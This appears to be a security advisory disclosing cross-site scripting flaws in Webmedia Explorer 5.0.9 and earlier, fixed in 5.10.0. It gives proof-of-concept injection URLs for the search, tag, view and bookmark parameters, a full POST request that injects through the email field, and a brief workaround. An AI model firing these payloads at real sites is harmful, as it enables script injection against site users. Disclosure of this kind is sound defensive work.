|
Brought to you by:
Suppliers of:
|
|
|
| |
| Webmedia Explorer's search, tag, bookmark parameters have been found to contain a security vulnerability that allows remote attackers to cause cross site scripting vulnerabilities. |
| |
Credit:
The information has been provided by MaXe.
|
| |
Vulnerable Systems:
* Webmedia Explorer version 5.0.9 and prior
Immune Systems:
* Webmedia Explorer version 5.10.0 and later
Cross Site Scripting: (by using event handlers) http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0)
---
-- Will be executed when a user moves his mouse over the search field.
http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over a tag.
http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')"
onmouseover=alert(0) > ---
-- Will be executed when a user moves his mouse over the column field.
(unlikely)
http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark="
onmouseover=alert(0) > ---&action=edit
-- Requires admin access, however since this is a hidden tag exploitation is highly unlikely.
POST Method - Cross Site Scripting:
Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code=
(the following was sent: " onmouseover=alert(0) > --- )
Workaround
Filtering event handlers should do the trick.
|
|
|
|
|
